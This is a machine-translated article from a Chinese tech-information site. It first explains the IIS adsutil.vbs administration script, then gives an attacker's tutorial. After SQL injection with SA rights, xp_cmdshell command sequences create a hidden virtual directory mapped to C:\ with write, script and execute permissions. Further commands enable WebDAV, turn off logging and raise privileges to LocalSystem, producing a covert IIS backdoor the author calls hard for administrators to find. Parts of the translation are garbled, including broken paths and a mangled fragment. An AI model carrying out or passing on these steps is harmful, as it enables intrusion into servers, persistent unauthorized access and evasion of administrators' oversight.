Shulou(Shulou.com)06/03 Report--

This article mainly introduces the use of Adsutil.vbs in scripting attacks. It is very detailed and has certain reference value. Friends who are interested must finish reading it.

1. Brief introduction

What is adsutil.vbs? I believe that the network administrator who has used IIS will know. This is a script that comes with IIS to manage IIS from the command line. Located in the% SystemDrive%\ Inetpub\ AdminScripts directory. It's a full 95426 bytes. Such a big script can be seen to be powerful. And it is true. Basically, I feel that it is a "Internet information service manager" under the command line. (in fact, there are more than 20 vbs files under% SystemDrive%\ Inetpub\ AdminScripts on 2000 of the servers for management. By 2003, adsutil.vbs was the only one left. It is enough to show how complex its function is)

When it comes to adsutil.vbs, you have to mention MetaBase.bin. This file is the most important configuration file for IIS. All settings for IIS will eventually be stored in this file. The IIS manager and adsutil.vbs are displayed to the user by reading configuration information from this file. The storage structure of MetaBase.bin is very much like the registry, which is a tree storage structure. The IIS manager and adsutil.vbs access MetaBase.bin through a path to Adspath. The path starts with IIS:\, where LocalHost represents the local server and w3svc represents the IIS service. For example, IIS:\ LocalHost/w3svc/1 represents the first web site on the local server. IIS:\ LocalHost/w3svc/1/root/Vdir represents the Vdir virtual directory under the root directory of the first web site.

With this preknowledge, let's go back to adsutil.vbs and take a look at its usage:

C:\ Inetpub\ AdminScripts > cscript adsutil.vbs / / Don't forget to type the script host file name cscript.exe.

Microsoft (R) Windows Script Host Version 5.6

Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.

Usage:

ADSUTIL.VBS [[]]

Description:

IIS administration utility that enables the configuration of metabase properties

.

Supported Commands: / / supported commands. This is the most important.

GET, SET, ENUM, DELETE, CREATE, COPY

APPCREATEINPROC, APPCREATEOUTPROC, APPCREATEPOOLPROC, APPDELETE, APPUNLOAD, AP

PGETSTATUS

Samples: / / A few simple examples

Adsutil.vbs GET W3SVC/1/ServerBindings / / check the binding port of the first virtual web site. W3SVC/1 here is an abbreviation for IIS:\ LocalHostW3SVC/1, and ServerBindings is his attribute. Same as below.

Adsutil.vbs SET W3SVC/1/ServerBindings ": 81:" / / set the binding port of the first virtual web site to 81.

Adsutil.vbs CREATE W3SVC/1/Root/MyVdir "IIsWebVirtualDir" / / create a virtual directory of MyVdir under the root of the first virtual web site. The following "IIsWebVirtualDir" refers to the directory type.

Adsutil.vbs START_SERVER W3SVC/1 / / launch the first virtual web site.

Adsutil.vbs ENUM / P W3SVC / / View all sites of IIS.

For Extended Help type:

Adsutil.vbs HELP / / if you want further help, type this command. I won't turn around here. To prevent people from saying that I earn money. You can see for yourself.

The text after the above "/ /" is all the comments I added (the same below). I believe this should be able to understand it, everyone.

There are several commonly used adsutil.vbs commands: GET, SET, ENUM, DELETE, CREATE. Now let me explain one by one:

The GET command is usually used to view the property values of a directory. SET is used to set directory properties. ENUM is also used to view properties. The difference is that he directly displays all the properties that have been set. Usually there are several pages of things to read in a catalog. He has an optional "/ p" switch. If you add this switch. He will only list all virtual directories under this directory. The DELETE command is used to delete the virtual directory. CREATE is to create a virtual directory. There are several other commands: START_SERVER, STOP_SERVER, PAUSE_SERVER, CONTINUE _ SERVER. They are to start, stop, pause and resume the operation of the virtual site.

The approximate property values of a virtual directory are as follows (I only listed what we might use, otherwise it would be too long):

KeyType: (STRING) "IIsWebVirtualDir" / / directory type, (STRING) indicates that it is an attribute of string type

AppRoot: (STRING) "/ LM/W3SVC/1/ROOT" / / directory IIS path

AppFriendlyName: (STRING) "default Application" / / Application name

AppIsolated: (INTEGER) 2 / / specifies whether to run out of process or in process, numeric type attribute.

HttpCustomHeaders: (LIST) (1 Items) / / Custom IIS header

"Powered By: www.WoFeiWo.Info"

HttpErrors: (LIST) (42 Items) / / pages returned by various IIS codes. You can set it yourself. I'm going to omit it here.

DefaultDoc: (STRING) "Default.htm,index.htm,Default.asp,in

The default main page name of the dex.asp,Default.php,index.php,Default.aspx,index.aspx "/ / directory.

Path: (STRING) the physical path actually mapped by the "D:\ ftp" / / directory

AccessFlags: (INTEGER) 513 / / I don't know what this is. It's not set up anyway. It seems to be set automatically.

AccessExecute: (BOOLEAN) execution permission of the False / / directory, which is a Boolean value

AccessSource: (BOOLEAN) whether Webdav access to the False / / directory is allowed

AccessRead: (BOOLEAN) read-only permissions for the True / / directory

AccessWrite: (BOOLEAN) write access to the False / / directory

AccessScript: (BOOLEAN) whether the True / / directory allows script execution

AccessNoRemoteExecute: (BOOLEAN) False

AccessNoRemoteRead: (BOOLEAN) False

AccessNoRemoteWrite: (BOOLEAN) False

AccessNoRemoteScript: (BOOLEAN) False

AccessNoPhysicalDir: (BOOLEAN) False

ScriptMaps: (LIST) (27 Items) / / Application extension mapping

".asa, C:\ WINDOWS\ system32\ inetsrv\ asp.dll,5,GET,HEAD,POST,TRACE"

".asp, C:\ WINDOWS\ system32\ inetsrv\ asp.dll,5,GET,HEAD,POST,TRACE"

".aspx, C:\ WINDOWS\ Microsoft.NET\ Framework\ v1.1.4322\ aspnet_isapi.dll,1,GET,HEA

Dre post, dh post, and debug.

. / / n multi-data is omitted here

AspEnableParentPaths: (BOOLEAN) True

AppPoolId: (STRING) "DefaultAppPool" / / Application pool name

DontLog: (BOOLEAN) True / / prohibit IISLog recording

DirBrowseFlags: (INTEGER)-1073741762

EnableDirBrowsing: (BOOLEAN) whether column directories are allowed in True / / directories

DirBrowseShowDate: (BOOLEAN) True / / here and below are the parameter settings when the directory is displayed. English is very simple. I won't say any more.

DirBrowseShowTime: (BOOLEAN) True

DirBrowseShowSize: (BOOLEAN) True

DirBrowseShowExtension: (BOOLEAN) True

DirBrowseShowLongDate: (BOOLEAN) True

EnableDefaultDoc: (BOOLEAN) True / / whether to open the default master document

This is what I saw on my machine with the cscript adsutil.vbs ENUM w3svc/1/root command. You can also enter the above commands to study.

We can set all the above properties through the SET command. As follows:

Cscript adsutil.vbs SET w3svc/1/root/ directory name / attribute name setting value

For example, cscript adsutil.vbs SET w3svc/1/root/wofeiwo/AccessRead 1 / / sets the readable permission of the wofeiwo virtual directory under the first virtual web site to Ture

Or: cscript adsutil.vbs SET w3svc/1/root/wofeiwo/Path "C:\" / / sets the mapping path of the directory to "C:\"

Let's take a look at an example of our simple use.

II. Utilization of adsutil.vbs

(1) New ideas for uploading MSSQL Injection

Maybe you will encounter this situation in the injection of MSSQL: SA permissions. You can execute Cmd commands (xp_cmdshell, sp_OACreate, Job, and so on). But the server is on the intranet. There's a fortress mainframe outside. It's just a mapping of port 80. 3389 is useless (intranet can not be connected), all the reverse Trojans can not be uploaded (Tftp, Ftp, Wget, exe2bat, etc.) what should you do?

Brother Amanl's classic "bleed the Last drop of MSSQL" gives us a good idea: use vbs under% SystemDrive%\ Inetpub\ AdminScripts to create a new virtual directory. Customize the absolute path of its mapping. This bypasses the guess of the absolute path of web. Then you can get a shell by backing up the database or temporary table to a virtual directory (or directly echo) through BACKUP or MASKWEBTASK.

The above ideas are really good. But people who use stinky begging GetWebShell or Xiaozhu NBUpFile all know how low the success rate of BACKUP or MASKWEBTASK is. And echo. I don't want to talk about it either. Writing one line at a time is simply looking for pain. (and keep turning special characters. )

In fact, we can improve the idea of Brother Amanl. When we set up a new virtual directory. You can add permission to write to the directory. Plus Webdav... So will we be able to upload any files directly through IIS soon? It's not just text files anymore. If we upload a reverse back door to execute via SA... Oh, everything will be done!

Come on, put it into practice at once:

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir";--

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs cscript adsutil.vbs SET w3svc/1/root/wofeiwo/Path "C:\";--

Note that the special characters above have to be changed by themselves. Or you can use NBSI2 or the path's SQLCOMM to execute the above command.

So we set up a virtual directory of wofeiwo under the first web site and mapped it to the C: root directory. I gave him read and write permission, and in order to get a webshell, I added permission to execute the script:

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessRead 1

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessWrite 1

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessScript 1

Friends who have read Surperhei's "use of IIS write permissions" may want to construct their own http packages to upload files. In fact, there is a simpler way:

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/EnableDirBrowsing 1

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessSource 1

Set to allow column directories and webdav access, then open your IE,Ctrl+O and open the Open dialog box and type the virtual directory you just set up. Check Open as Web folder and make sure. As shown in the figure:

Figure 1

Ah! Do you see all the folders? As shown in the figure:

Figure 2

Now you can manipulate the above files as if you were a normal folder. You can also copy files by Ctrl+C or Ctrl+V. Realize the function of uploading and modifying files conveniently.

(2) go further

In fact, we can go a step further and use the ideas mentioned above to directly make an IIS back door. Come on, let's see what I can do! (the method described by the moving shark in the near-perfect IIS backdoor is used here. But I did the setup directly with adsutil.vbs, a tool that comes with MS. Friends who are interested in this article can find it for themselves. )

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir";-/ / first create a wofeiwo directory.

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo/door "IIsWebVirtualDir";-- / / create another door directory under the wofeiwo directory.

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs cscript adsutil.vbs SET w3svc/1/root/wofeiwo/door/Path "C:\";-/ sets the door directory to map to the C: root directory.

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessRead 1 permissions are set to the directory here and below. You can refer to the above command comments.

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessWrite 1

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessScript 1

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/DontLog 1

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/EnableDirBrowsing 1

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessSource 1

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessExecute 1

Some people may say, what? Isn't it the same as the one above? He he. Actually, take a closer look. You will find that the first directory we created above, "wofeiwo", does not set the "Path" property. That means he didn't map to any actual directory. A vulnerability in IIS (involving IIS5.0.1.0) is applied here. That is, virtual directories that do not have the "Path" attribute will not appear in the IIS manager. It's the equivalent of a hidden directory. The virtual directory "door" under it is also invisible because the parent directory is not visible! But the "door" directory has the "Path" property set. So if we submit the http://IP/wofeiwo/door/ path. The result is that the file directory under C: is returned. Now this directory is where we can write and read files at will. And you can also go to the System32 directory to run the program. Our back door is in its infancy. (note that I have added AccessExecute execution permission here.)

But the programs we are executing now are still the Guest permissions of the default IUSR user of IIS. We're always upset that we don't have big access. Let's enhance our permissions, not to mention the addition of IUSR users as administrators. Let's talk about the other two methods:

1. Set AppIsolated so that the program in this directory is carried out in the process of IIS. This inherits the System permissions of IIS.

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/ AppIsolated 0-

2. Add the asp.dll that parses the asp file to the privileged dll of IIS. Make it run in the process. Thus the LocalSystem permission to IIS.

1) get all the privileged dll of IIS first

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs GET w3svc.InProcessIsapiAppsProcessIsapiApps

Return:

InProcessIsapiApps: (LIST) (5 Items)

"C:\ WINDOWS\ system32\ inetsrv\ httpext.dll"

"C:\ WINDOWS\ system32\ inetsrv\ httpodbc.dll"

"C:\ WINDOWS\ system32\ inetsrv\ ssinc.dll"

"C:\ WINDOWS\ system32\ msw3prt.dll"

"C:\ WINDOWS\ Microsoft.NET\ Framework\ v1.1.4322\ aspnet_isapi.dll"

2) set the asp.dll to the InProcessIsapiApps group. Note here that all the dll found above are added, otherwise they will be deleted.

Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive%\ Inetpub\ AdminScripts\ adsutil.vbs SET w3svc/InProcessIsapiApps "C:\ WINDOWS\ system32\ inetsrv\ httpext.dll"C:\ WINDOWS\ system32\ inetsrv\ httpodbc.dll"C:\ WINDOWS\ system32\ inetsrv\ ssinc.dll"C:\ WINDOWS\ system32\ msw3prt.dll"C:\ WINDOWS\ Microsoft.NET\ Framework\ v1.1.4322\ aspnet_isapi.dll"C:\ WINDOWS\ system32\ inetsrv\ asp.dll";-

Return:

InProcessIsapiApps: (LIST) "C:\ WINDOWS\ system32\ inetsrv\ httpext.dll"C:\ WINDOWS\ system32\ inetsrv\ httpodbc.dll"C:\ WINDOWS\ system32\ inetsrv\ ssinc.dll"C:\ WINDOWS\ system32\ msw3prt.dll"C:\ WINDOWS\ Microsoft.NET\ Framework\ v1.4322\ aspnet_isapi.dll"C:\ WINDOWS\ system32\ inetsrv\ asp.dll"

So it's set up. In the future, no matter what asp file is LoaclSystem permission. Go through the steps above. Our IIS back door is basically set up. You can upload the asp Trojan for auxiliary control. Such a set-up backdoor is very difficult for the administrator to find. And communicate completely through port 80 of IIS. There's no log record. So it's pretty safe.

The above is all the content of the article "what is the use of Adsutil.vbs in scripting attacks?" Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.